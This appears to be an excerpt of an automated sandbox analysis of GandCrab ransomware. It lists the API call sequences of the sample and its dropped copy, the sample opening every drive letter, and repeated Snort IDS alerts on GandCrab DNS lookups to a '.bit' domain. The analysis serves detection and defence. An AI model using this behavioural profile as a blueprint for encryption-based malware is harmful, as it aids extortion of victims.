Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_00405D80 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	13_2_00405D80
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_00407DB0 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	13_2_00407DB0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_004048A0 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,	21_2_004048A0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_00405540 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	21_2_00405540
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_00405750 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	21_2_00405750
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_00405050 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,MultiByteToWideChar,GetLastError,VirtualAlloc,VirtualFree,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,	21_2_00405050
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_00407C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	21_2_00407C60
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	21_2_00406000
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_00405D80 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	21_2_00405D80
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_00407DB0 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	21_2_00407DB0

Source: 9gkAKTWOXp.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9gkAKTWOXp.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	1_2_004066F0
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	1_2_004064A0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	13_2_004066F0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	13_2_004064A0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	21_2_004066F0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	21_2_004064A0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51141 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51142 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51143 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51144 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:52957 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:52958 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:52959 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:52960 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60584 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60585 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60586 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60587 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57136 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57137 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57138 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57139 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:56044 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:56045 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:56046 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:56047 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59638 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59639 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59640 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59641 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55640 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55641 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55642 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55643 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57706 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57707 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57708 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57709 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65322 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65323 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65324 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65325 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60769 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60770 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60771 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60772 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65109 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65110 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65111 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65112 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53850 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53851 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53852 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53853 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57573 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57574 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57575 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57576 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53307 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53308 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53309 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53310 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59435 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59436 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59437 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59438 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53846 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53847 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53848 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53849 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53468 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53469 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53470 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53471 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53625 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53626 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53627 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53628 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61418 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61419 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61420 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61421 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65198 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65199 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65200 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65201 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59583 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59584 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59585 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59586 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53051 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53052 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53053 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53054 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60090 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60091 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60092 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60093 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63564 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63565 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63566 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63567 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53430 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53431 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53432 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53433 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65513 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65514 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65515 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65516 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59822 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59823 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59824 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59825 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64597 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64598 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64599 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64600 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64825 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64826 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64827 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64828 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51994 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51995 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51996 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51997 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58121 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58122 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58123 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58124 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49168 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49169 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49170 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49171 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58303 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58304 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58305 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58306 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63448 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63449 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63450 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63451 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49876 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49877 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49878 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49879 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65387 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65388 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65389 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65390 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54155 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54156 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54157 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54158 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64604 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64605 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64606 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64607 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50786 -> 8.8.8.8:53
